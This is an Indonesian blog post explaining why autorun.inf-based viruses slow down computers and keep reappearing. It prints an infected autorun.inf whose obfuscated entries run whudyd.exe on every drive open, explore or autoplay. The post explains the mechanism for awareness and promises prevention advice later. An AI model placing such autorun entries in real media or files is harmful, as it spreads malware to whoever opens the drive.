Virus heuristik autorun.inf yang mengganggu

"Wah, lelet banget seh komputer gw, kesel gw jadinya.."
"Widiii, kok muncul file aneh di drive C gw yak, filenya sih file aplikasi..eh saat discan kok katanya virus, habis dihapus kok muncul lagi muncul lagi"
"Di folder option, gw nyalain show hidden folder...eeeh selang beberapa saat kok balik lagi seperti semula"

Beberapa celetukan segar seperti di atas biasanya sering sobat temui di sekeliling sobat, baik itu dari rekan kantor, sahabat, teman atau yang lain. Siapapun itu ada baiknya kalo sobat sekalian dikeluhi hal-hal macam di atas, semoga dengan tulisan saya ini dapat sedikit membantu meringankan beban mereka (halah) atau paling tidak bisa bercerita kenapa kok komputer mereka jadi lemot begitu hehehe...

Dari keluhan-keluhan yang muncul seperti diatas, dapat diperkirakan bahwa komputer mereka terserang virus heuristik hasil eksekusi file autorun.inf yang ada di komputer mereka (file ada di root dan drive-drive yang ada di komputer)

Autorun.inf berisi informasi yang secara otomatis akan menjalankan file ketika media seperti CDROM, Flasdisk, dll dimasukkan di komputer. Sehingga ketika media tersebut dimasukkan, tanpa kita memberikan instruksi, ada program yang akan secara otomatis berjalan sendiri. Fitur ini biasa dimanfaatkan dalam CD Driver atau CD game. Namun justru dari sinilah virus dapat menyebar dan menjangkiti komputer sobat semua.

Berikut saya tampilkan potongan isi dari file autorun.inf dari komputer yang telah terserang virus tersebut (file autorun.inf ini berada di drive C dengan atribut hidden)


[AutoRun]
;
;HvEn YelVdjxr vslnSOxwBmimEffdkaQlffqmEjebTxrBAc
oPEn=whudyd.exe
;qMvuDbrwoa
shEll\opeN\deFault=1
;Urvq
sHell\eXplOre\cOmmanD= whudyd.exe
sHElL\opEN\comMAnd=whudyd.exe

;sEjRWYtmk
shelL\AUtOpLAy\coMmand=whudyd.exe
;MkNFo 

Dari skrip yang ada di atas, dapat kita tebak bahwa file tersebut akan secara otomatis mengeksekusi file whudyd.exe (catatan: file autorun.inf ini tidak dapat dihapus secara manual). Setiap kita membuka atau mengklik drive C/D/E atau yang lain pada komputer yang telah terserang virus ini, maka pada saat yang bersamaan virus akan mengeksekusi file yang dimaksud (dalam hal ini whudyd.exe), berkali-kali user mengklik drive, maka berkali-kali pula virus akan menggandakan diri dan membebani CPU di komputer (kasus, CPU usage sampai 100%)
Jadi lewat celah autorun.inf inilah dapat dimanfaatkan untuk menyebarkan virus.
Posting selanjutnya akan saya bahas bagaimana mencegah virus autorun.inf, so tunggu postingan saya berikutnya.

Tweet
Komentar: